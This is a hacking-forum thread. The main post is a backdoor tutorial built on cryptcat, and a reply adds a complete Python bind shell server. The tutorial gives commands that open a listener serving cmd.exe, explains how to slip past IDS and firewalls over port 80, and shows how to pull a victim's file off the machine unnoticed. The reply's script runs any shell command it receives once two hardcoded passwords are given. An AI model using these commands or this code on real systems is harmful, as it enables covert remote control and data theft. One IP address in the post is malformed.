Backdoor Complete Tutorial For Beginners To Expert!

Tutorials & Methods
, ,
1

image
image953×495 79.1 KB

Attention! All information is provided for informational and educational purposes only. The author is not responsible for any possible harm caused by the materials of this article.

In this article we will talk about backdoor so straight to the point.

Backdoor , backdoor (back door — “back door”, literally “back door”) is an algorithm defect that is intentionally built into it by the developer and allows unauthorized access to data or remote control of the operating system and the computer as a whole …
The main goal of the backdoor is to secretly and quickly gain access to data, in most cases — to encrypted and protected data. For example, a backdoor can be built into an encryption algorithm for the subsequent wiretapping of a secure channel by an attacker.u

The perfect backdoor

  • impossible to detect;
  • can be used repeatedly;
  • It is easy to deny — it looks like a mistake, and if found, the developer can refer to the fact that he made this mistake by accident and had no malicious intent;
  • we exploit only with knowledge of the secret — only those who know how the backdoor is activated can use it;
  • protected from compromise by previous uses — even if the backdoor was discovered, it is impossible to establish who previously exploited it and what information the attacker possessed;
  • it is difficult to repeat — even if the backdoor was found by someone, it will not be possible to use it in another code or in another device.

Building Backdoor with Cryptcat!

Cryptcat allows us to communicate between two systems and encrypts the communication between them using twofish, one of many excellent encryption algorithms.

In this tutorial, we’ll introduce you to netcat’s popular cousin, cryptcat (which is actually much prettier and more exotic than plain netcat).

Since twofish encryption is on par with AES encryption, this makes cryptcat practically bulletproof. Thus, IDS cannot detect harmful behavior even when it routes through such normal HTTP ports 80 and 443.

Step 1: Download Cryptcat

You can download and install cryptcat on Windows system from this link .

Step 2: Open a listener on a Windows system

We can open a listener on any system with the same syntax as for netcat. In our case, we open a listener on Windows 7 on port 6996 and create a command shell.

cryptcat -l -p 6996 -e cmd.exе

Cryptcat-1

-l means “open listener”

-p 6996 means “place listener on port 6996”

-e cmd.exe means “start a command shell for communication”

Step 3: Open Snort or Other IDS

Now, let’s run an IDS like Snort on another system that will connect to the Windows system to see if encryption can blind the IDS, leaving our back door invisible to such security devices.

Cryptcat-2

Step 4: Connect to Windows system with Cryptcat

Cryptcat is installed on BackTrack by default, so we don’t have to download and install it. In addition, it is located in the / bin directory, so we can access it from any directory.

Now let’s connect to the Windows 7 cryptcat system from our BackTrack system and see if we can make an encrypted backdoor connection that is almost undetectable.

cryptcat 192.168.4.182.248 6996

Cryptcat-3

As you can see, we are connected to a Windows 7 system and got a command shell from Win 7 system! This gives us significant control over this system, but not total control, because the command shell has limited capabilities.

Step 5: Check Snort Logs and Alerts

This type of attack (shell passing through the network) is easily detected by Snort or other IDS when the connection is not encrypted. The Snort rules will warn the sysadmin that the cmd.ex shell is going through the network connection, and they will probably do something to deter you from using that shell. With an encrypted connection available from cryptcat, this connection is nearly impossible to detect.

Let’s go back and check the logs and alerts in Snort. If we were successful in evading IDS, then we shouldn’t see a warning about shell movement across the network. We can check our logs by going to / var / snort / alerts and seeing if there are any signals caused by our communication with the Windows machine (usually we should find an alert).

kwritе / var / snort / alerts

Cryptcat-4

As you can see, we have been successful. We were able to connect to the Windows system without attracting the attention of any of the security systems!

Step 6: Send Crypcat over port 80 to evade the firewall

Although we have successfully created an encrypted backdoor on the victim’s system, a close security administrator will notice that an unusual port (6996) is open. This will most likely initiate some kind of security admin action to restrict our access. Also, on systems with a good sysadmin and a good firewall, this port is likely to be blocked by the firewall.

For any network to be able to communicate on the Internet, it will most likely need to keep ports 80 and 443 open, but also possibly 25, 53, and 110. Since unencrypted, normal Internet traffic goes through port 80, which is almost always open, then a slight increase in traffic is hardly noticed.

Now that we have successfully used cryptcat, we will send it over port 80 with all other internet traffic. Although encrypted, it will look like any binary data transmitted over the line. Therefore, it will be nearly impossible for security devices to detect to block it, as they must always allow traffic on port 80, and the traffic is encrypted and the IDS will not be able to “see” its contents.

Here we will move a file from the victim’s system called topsecret.txt to our attacking system without being detected by any security device. This time, instead of sending a shell over the network, we will send a top secret file called topsecret.txt over our encrypted connection. We can do this by typing at the Windows command line:

cryptcat -l -p 80 <topsecret.txt

Cryptcat-5

-l means “open listener”

-p 80 means “open listener on port 80”

<means “send a file through this listener”

Step 7: Connect to the listener

Now let’s connect to the victim’s system and pull out the top secret file. All you need to do is connect to the listener by typing cryptcat, the victim’s system IP address, and the listener’s port number.

cryptcat 192.168.182.248 80

Cryptcat-6

As you can see, the file went through our link successfully!

Step 8: Check the alert file

Let’s check our Snort log files again to prove that our IDS did not detect this top secret file traffic.

kwrite / var / snort / alerts

Cryptcat-7

As you can see, our top secret file moved through port 80 under the noses of sysadmins, IDS and firewall without a trace!

Cryptcat is a great little tool for moving data outside the victim’s system through normally open ports without being detected by any security devices.

Source: meduim & credit to Hackfreaks

Happy learning!

3 Likes
2 
import socketserver
import re
import subprocess
import os
class BindShellOpener(socketserver.BaseRequestHandler):
	# def serve_forever(self):
	# 	self.logger.debug('waiting for request')
	# 	self.logger.info('Handling requests, press <Ctrl-C> to quit')
	# 	while True:
	# 		self.handle_request()
	# 	return
	def remove(self, string): 
	    pattern = re.compile(r'/\r?\n|\r/') 
	    res = re.sub(pattern, '', string)
	    return res[0:len(res)-1]
	def handle(self):
		flag = False
		try:
			pass_1 =  'PASS1'
			pass_2 = 'PASS_2'
			self.request.send('SOME AUTH IS REQUIRED! VROOO!!:\n'.encode())
			user_input = self.request.recv(1024)
			user_input = user_input.decode()
			user_input = self.remove(user_input)

			if user_input == pass_1:
				self.request.send('2nd Phase of Pass:\n'.encode())

				user_input_2 = self.request.recv(1024)
				user_input_2 = user_input_2.decode()
				user_input_2 = self.remove(user_input_2)

				if user_input_2 == pass_2:
					self.request.send('GG VRO WELLDONE\n'.encode())
					flag = True
				else:
					self.request.send('WRONG PASSWORD\n'.encode())
			else:
				self.request.send('WRONG PASSWORD\n'.encode())
			while flag:
				self.request.send("{} => ".format(os.getcwd()).encode())
				data = self.request.recv(1024)
				data = data.decode()
				data = self.remove(data) # remove all spaces

				if data[0:] == "quit":
					self.request.send("\nBye Bye\n".encode()) 
					break
				elif data[:2] == "cd":
					try:
						os.chdir(data[3:])
					except Exception as e:
						self.request.send("\nWrong Directory Path\n".encode())
				else:
					proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, \
						stderr=subprocess.PIPE, stdin=subprocess.PIPE)
					stdoutput = proc.stdout.read() + proc.stderr.read()
					stdoutput.decode()
					self.request.sendall(stdoutput)

		except Exception as e:
			print(e)
		finally:
			pass

def main():
	server_addr = ("0.0.0.0", 9015)
	server = socketserver.TCPServer(server_addr, BindShellOpener)

	server.serve_forever()

if __name__ == "__main__":
	main()
1 Like
3

a simple bindshell with auth but the connection isnt encrypted. will update later with secure socket.
this looks simple but is useful.